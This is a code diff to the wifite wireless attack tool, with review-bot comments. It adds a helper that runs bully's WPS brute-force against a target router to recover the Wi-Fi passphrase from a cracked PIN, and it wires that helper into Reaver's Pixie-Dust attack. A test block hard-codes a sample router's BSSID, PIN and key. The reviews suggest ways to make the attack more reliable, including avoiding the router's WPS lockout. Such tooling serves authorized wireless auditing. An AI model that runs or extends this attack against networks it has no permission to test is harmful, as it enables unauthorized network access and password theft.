diff --git a/wifite/tools/bully.py b/wifite/tools/bully.py
index c083e02..cdc0862 100755
--- a/wifite/tools/bully.py
+++ b/wifite/tools/bully.py
@@ -2,12 +2,12 @@
 # -*- coding: utf-8 -*-
 from ..model.attack import Attack
+from ..model.wps_result import CrackResultWPS
 from ..tools.airodump import Airodump
 from ..util.color import Color
 from ..util.timer import Timer
 from ..util.process import Process
 from ..config import Configuration
-from ..model.wps_result import CrackResultWPS
 import os, time, re
 from threading import Thread
@@ -214,7 +214,48 @@ class Bully(Attack):
 def __del__(self):
 self.stop()
+ @staticmethod
+ def get_psk_from_pin(target, pin):
+ '''
+ bully --channel 1 --bssid 34:21:09:01:92:7C --pin 01030365 --bruteforce wlan0mon
+ PIN : '01030365'
+ KEY : 'password'
+ BSSID : '34:21:09:01:92:7c'
+ ESSID : 'AirLink89300'
+ '''
+ Color.pl('\n{+} found PIN: {G}%s{W}' % pin)
+ Color.p('{+} fetching {C}PSK{W} using {C}bully{W}... ')
+ cmd = [
+ 'bully',
+ '--channel', target.channel,
+ '--bssid', target.bssid,
+ '--pin', pin,
+ '--bruteforce',
+ Configuration.interface
+ ]
+
+ bully_proc = Process(cmd)
+
+ for line in bully_proc.stderr().split('\n'):
+ key_re = re.search(r"^\s*KEY\s*:\s*'(.*)'\s*$", line)
+ if key_re is not None:
+ psk = key_re.group(1)
+ Color.pl('{W}found PSK: {G}%s{W}' % psk)
+ return psk
+
+ Color.pl('{R}failed{W}')
+ return None
+
 if __name__ == '__main__':
+ Configuration.initialize()
+ Configuration.interface = 'wlan0mon'
+ from ..model.target import Target
+ fields = '34:21:09:01:92:7C,2015-05-27 19:28:44,2015-05-27 19:28:46,1,54,WPA2,CCMP TKIP,PSK,-58,2,0,0.0.0.0,9,AirLink89300,'.split(',')
+ target = Target(fields)
+ psk = Bully.get_psk_from_pin(target, '01030365')
+ print "psk", psk
+
+ '''
 stdout = " [*] Pin is '11867722', key is '9a6f7997'"
 Configuration.initialize(False)
 from ..model.target import Target
@@ -222,3 +263,4 @@ if __name__ == '__main__':
 target = Target(fields)
 b = Bully(target)
 b.parse_line(stdout)
+ '''
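Review bot: `get_psk_from_pin` starts `Process(cmd)` and then blocks on `bully_proc.stderr()` with, as far as is visible here, no time limit and nothing that terminates the child, so a bully `--bruteforce` run against an AP that rate-limits WPS or never answers stalls the whole attack flow indefinitely; bound the wait (a timeout on the Process wrapper if it offers one, then kill bully) and route expiry into the existing `{R}failed{W}` / `return None` path. Two smaller checks: the docstring shows bully's `KEY : '...'` line but not which stream it is printed on, so confirm it really is stderr — if it goes to stdout this method always reports failure — and pass `'--channel', str(target.channel),` so a non-string channel cannot break argument building. The `__main__` block keeps a hard-coded interface and a Python 2 `print "psk", psk` statement next to a large old test fenced in `'''`; if the module is meant to stay importable on Python 3 use `print(...)`, and the dead test is better deleted than commented out. The `__main__` run continues into the next hunk.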
diff --git a/wifite/tools/reaver.py b/wifite/tools/reaver.py
index 5a3fe48..2205941 100755
--- a/wifite/tools/reaver.py
+++ b/wifite/tools/reaver.py
@@ -6,6 +6,7 @@ from ..config import Configuration
 from ..util.color import Color
 from ..util.process import Process
 from ..tools.airodump import Airodump
+from ..tools.bully import Bully # for PSK retrieval
 from ..model.wps_result import CrackResultWPS
 import os, time, re
@@ -33,6 +34,7 @@ class Reaver(Attack):
 '--bssid', self.target.bssid,
 '--channel', self.target.channel,
 '--pixie-dust', '1', # pixie-dust attack
+ '--timeout', '4', # Stop waiting after 4 seconds
 #'--delay', '0',
 #'--no-nacks',
 '--session', '/dev/null', # Don't restart session
@@ -80,9 +82,17 @@ class Reaver(Attack):
 # Check if we cracked it.
 if pin is not None:
 # We cracked it.
+
+ if psk is None:
+ # Try to derive PSK from PIN using Bully
+ psk = Bully.get_psk_from_pin(self.target, pin)
+
 bssid = self.target.bssid
 Color.clear_entire_line()
-Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN and PSK{W}")
+ if psk is None:
+ Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN{W} (but not PSK)")
+ else:
+ Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN and PSK{W}")
 Color.pl("")
 self.crack_result = CrackResultWPS(bssid, ssid, pin, psk)
 self.crack_result.dump()
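Review bot: The comment on the added `'--timeout', '4'` line reads as an overall cap on the run, but reaver's `-t/--timeout`, as far as I recall its help text, is the receive timeout for each WPS message exchange with a default of 5 seconds, so this shortens a single wait by one second rather than stopping after 4 seconds; please confirm against the installed reaver and reword to something like `# receive timeout per WPS message exchange (reaver default: 5s)`. The command list being edited starts and ends outside the hunk.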
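Review bot: `Bully.get_psk_from_pin(self.target, pin)` runs before `CrackResultWPS(bssid, ssid, pin, psk)` is built and dumped, so if bully is not installed or the helper raises, the exception unwinds past this block and the PIN that was just recovered is never saved; keep the fallback best-effort with `try: psk = Bully.get_psk_from_pin(self.target, pin)` / `except Exception: psk = None  # bully missing or crashed; the PIN is still worth saving`, or build and dump the result first and dump again once a PSK is known. Separately, bully is launched on `Configuration.interface` while `airodump_target` suggests airodump is still capturing on that interface, and it is not visible here whether the reaver process has been stopped at this point; two WPS tools hammering the same AP at once can trip its WPS lockout, so confirm reaver is terminated before the bully call. The enclosing method starts and ends outside the hunk.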